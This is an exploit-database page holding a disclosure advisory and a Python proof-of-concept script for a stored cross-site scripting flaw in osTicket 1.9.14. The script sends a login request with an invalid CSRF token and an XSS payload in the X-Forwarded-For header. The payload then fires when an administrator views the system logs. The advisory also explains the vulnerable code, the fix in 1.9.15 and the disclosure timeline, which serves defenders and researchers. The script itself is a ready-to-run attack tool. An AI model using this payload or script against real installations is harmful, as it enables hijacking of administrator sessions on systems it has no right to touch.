0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Osticket 1.9.14 - X-Forwarded-For Cross-Site Scripting Vulnerability
# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS. # Date: 24-11-2016 # Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ] # Software Link: http://osticket.com/ # Vendor: Osticket """ ============== DESCRIPTION ============== **osTicket** is a widely-used open source support ticket system. It seamlessly integrates inquiries created via email, phone and web-based forms into a simple easy-to-use multi-user web interface. Manage, organize and archive all your support requests and responses in one place while providing your customers with accountability and responsiveness they deserve. (copy of Osticket - README.md) ======================= VULNERABILITY DETAILS ======================= file `osticket/upload/bootstrap.php` contains this snippet of code (line 337-340): ... if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) // Take the left-most item for X-Forwarded-For $_SERVER['REMOTE_ADDR'] = trim(array_pop( explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']))); .... The $_SERVER['REMOTE_ADDR'] value gets overrided with the `X-Forwarded-For` header value, at this point, it is not a vulnerability but... file `osticket/upload/include/class.osticket.php` line 309-315 : ... //Save log based on system log level settings. $sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() ' .',title='.db_input(Format::sanitize($title, true)) .',log_type='.db_input($loglevel[$level]) .',log='.db_input(Format::sanitize($message, false)) .',ip_address='.db_input($_SERVER['REMOTE_ADDR']); db_query($sql, false); .... Everytime when a csrf attack is dettected (checking `X_CSRFTOKEN` header or the post parameter `__CSRFToken__`), Osticket saves into database the user controled value $_SERVER['REMOTE_ADDR'] even if it has an invalid format. Finally the XSS is triggered when a user who can see the system logs like an administrator, visits the /scp/logs.php URI. It happens because osticket does not encode the output of the data stored into the database. The code responsible for lanching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php` line 142... ... <td><?php echo $row['ip_address']; ?></td> ... So... An attacker can make an HTTP request with a header `X-Forwarded-For` containing the XSS payload with an invalid CSRF token to the login interface waiting for an administrator to view the logs and trigger the XSS. ================ DEMONSTRATION ================ Demo video: https://www.youtube.com/watch?v=lx_WlL89F70 The demo also show a low severity XSS vulnerability in the helpdesk name/title of osticket. ================ REFERENCES ================ https://github.com/osTicket/osTicket/releases https://github.com/osTicket/osTicket/releases/tag/v1.9.15 X-Forwarded-For XSS: https://github.com/osTicket/osTicket/pull/3439 https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631 heldeskt name/tile XSS: https://github.com/osTicket/osTicket/pull/3439 https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37 ================ MITIGATIONS ================ update to version 1.9.15 or later ================ CREDITS ================ Vulnerability discovered by Joaquin Ramirez Martinez https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos https://twitter.com/rammarj ================ TIMELINE ================ 13-07-2016 - Vulnerability found 19-09-2016 - Osticket knew the flaws 01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released) 24-11-2016 - Public disclosure. """ import urllib import urllib2 from optparse import OptionParser options = OptionParser(usage='python %prog [options]', description='Stored XSS') options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost') options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /') options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>' , help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"') banner = """ ====================================================== OSTICKET "The most popular ticketing system in the world" Stored XSS by i0-sec (Joaquin R. M.) ====================================================== """ def main(): opts,args = options.parse_args() print(banner) server = opts.target path = opts.path body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""}) headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload} url = server+path+"/scp/login.php" #default login interface URI for OSTICKET print('[+] Connecting to '+server+path) req = urllib2.Request(url, body, headers) try: print('[+] Sending payload... ') response = urllib2.urlopen(req) html = response.read() except Exception, e: pass print '[+] Payload sent.' print '[+] Completed.\n' if __name__ == '__main__': main() # 0day.today [2024-12-27] #